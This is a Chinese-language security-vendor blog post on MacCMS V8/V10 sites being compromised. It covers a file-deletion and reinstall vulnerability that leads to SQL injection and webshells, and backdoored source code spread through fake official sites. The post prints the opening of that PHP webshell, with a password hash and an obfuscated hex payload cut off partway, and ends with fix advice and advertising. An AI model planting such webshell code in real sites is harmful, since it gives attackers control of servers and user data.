蘋果CMS掛馬解決處理過程的文章

時間：2020-03-13作者：青島四海通達電子科技有限公司瀏覽：1002

目前蘋果CMS官方在不斷的升級補丁，官方較新的漏洞補丁對于目前爆發(fā)的新漏洞沒有任何效果。較新補丁的用戶網(wǎng)站還是會遭受到掛馬的攻擊，很多客戶因此找到我們SINE安全尋求網(wǎng)站安全技術(shù)上的支持，針對該漏洞我們有著*特的安全解決方案以及防止掛馬攻擊的防護，包括一些未公開的maccms POC漏洞都有修復(fù)補丁。

目前maccms官方被百度網(wǎng)址安全中心提醒您：該站點可能受到黑客攻擊，部分頁面已被非法篡改！ 蘋果官方網(wǎng)站因為特殊原因已經(jīng)停止訪問，該內(nèi)容被禁止訪問，但是升級補丁較新的網(wǎng)址還是可以打開的。

截圖如下：

蘋果CMS漏洞詳情：

蘋果CMS V8 V10版本存在代碼重裝漏洞，以及代碼后門漏洞，任意文件刪除漏洞，通過CNVD-2019-43865的信息安全漏洞通報，可以確認maccms V10存在漏洞，可以偽造惡意代碼發(fā)送到網(wǎng)站后端進行執(zhí)行，可以刪除網(wǎng)站目錄下的任意文件，可刪除重裝蘋果CMS系統(tǒng)的配置文件，導(dǎo)致可以重新安裝maccms系統(tǒng)，并在安裝過程中插入sql注入代碼到數(shù)據(jù)庫中去執(zhí)行并獲取webshell以及服務(wù)器權(quán)限。

蘋果CMS V8 V10 源代碼存在后門漏洞，經(jīng)過我們SINE安全技術(shù)的檢測發(fā)現(xiàn)，存在后門的原因是，目前百度搜索蘋果官網(wǎng)，maccms官方，排在百度搜索首頁的都是仿冒的網(wǎng)站，真正官網(wǎng)地址是，包括模板，圖片，以及CSS跟真正的官方是一模一樣，很多客戶都是點擊到這個**網(wǎng)站上去進行下載的源代碼，該代碼里隱藏了木馬后門文件,阿里云都無法檢測出來，

<?php

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 標題

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代碼如上面所示，是加密過的，經(jīng)過我們SINE安全的解密發(fā)現(xiàn)是PHP的腳本木馬，可以繞過各大服務(wù)器廠商的安全檢測，包括阿里云，騰訊云，百度云，華為云。

關(guān)于蘋果CMS網(wǎng)站漏洞的修復(fù)方案與辦法

對任意文件刪除漏洞做安全過濾與檢查，防止del刪除的語句的執(zhí)行，對**傳輸過來的參數(shù)進行嚴格的檢測，不管是get,post,cookies，如果您對代碼不是太懂的話也可以找專業(yè)的網(wǎng)站安全公司來處理解決蘋果CMS網(wǎng)站被攻擊的問題，或者是對重裝文件進行改名以及安裝配置文件進行權(quán)限設(shè)置，只讀權(quán)限，對于存在網(wǎng)站木馬后門的蘋果cms系統(tǒng)，人工對代碼進行安全審計，對所有網(wǎng)站目錄下每個代碼文件都要仔細的排查，可以下載官方的源代碼進行比對。


青島四海通達電子科技有限公司專注于服務(wù)器安全,網(wǎng)絡(luò)安全公司,網(wǎng)站安全防護,網(wǎng)站漏洞檢測,滲透測試,網(wǎng)站安全,網(wǎng)站漏洞掃描,網(wǎng)站安全檢測等, 歡迎致電 13280888826

• 詞條

  詞條說明

• 虛擬主機網(wǎng)站漏洞修復(fù)怎么做

  虛擬主機網(wǎng)站漏洞修復(fù)怎么做？越來越多的用戶敏感信息泄漏事情的發(fā)生，讓大家對于網(wǎng)站用戶的數(shù)據(jù)安全感到擔憂，不得不保護好虛擬主機網(wǎng)站的安全以及用戶的敏感數(shù)據(jù)。關(guān)于邏輯漏洞的修復(fù)方案首先從代碼進行安全檢測，存儲用戶密碼的地方進行嚴格的過濾；再一個就是敏感的信息在傳輸過程中，以及顯示到網(wǎng)站里的時候，都要進行加密，MD5加密，數(shù)據(jù)SSL加密傳輸，重要的數(shù)據(jù)盡可能的使用POST的提交方式進行，用戶密碼要使用加

• 技術(shù)支持

  團隊優(yōu)勢? ? ? ?擁有專業(yè)的安全團隊 ， 多年來積累構(gòu)建的網(wǎng)站漏洞信息平臺（ DEDECMS、DISCUZ、ECSHOP、Wordpress、PHPCMS、Thinkphp等網(wǎng)站漏洞），時刻洞察整個互聯(lián)網(wǎng)的安全態(tài)勢、漏洞信息、以及黑客較新的攻擊方法。正因為如此，我們具備攻擊者視角以及防御者視角的多維度防御方法！價格優(yōu)勢???

• 滲透基本流程

  滲透是指網(wǎng)絡(luò)安全專業(yè)人員模擬黑客入侵攻擊目標，以評估目標的安全防御能力。一般分為：黑盒滲透試驗、白盒滲透試驗、灰盒滲透試驗。滲透的類和組織的使用和范圍，以及他們是否想模擬員工、網(wǎng)絡(luò)管理員或外部來源的攻擊。在黑盒滲透中，人員沒有獲得大量關(guān)于他將的應(yīng)用程序的信息，人員有責任收集目標網(wǎng)絡(luò)、系統(tǒng)或應(yīng)用程序的信息；在白盒滲透中，人員將獲得完整的網(wǎng)絡(luò)、系統(tǒng)或應(yīng)用程序信息和源代碼、操作系統(tǒng)的詳細信息和其他所需信

• 網(wǎng)絡(luò)安全公司 網(wǎng)絡(luò)安全小技巧

  網(wǎng)絡(luò)安全公司 網(wǎng)絡(luò)安全小技巧一、保持較新。不但要堅持較新操作系統(tǒng)，還要保持較新版本的殺毒軟件等常用應(yīng)用軟件。二、密碼安全。同樣的密碼不要用多處；密碼用的長一點（如：15位）；提供密碼強度，建議使用**字符+字母+數(shù)字組合；賬號密碼多的建議使用專業(yè)的密碼管理軟件。三、軟件安全。電腦病毒雖然看起來走在安全軟件前，但是安全軟件仍然可以幫你擋住大量的惡意軟件；讓你的殺毒軟件和安全軟件保持較新狀態(tài)。四、時刻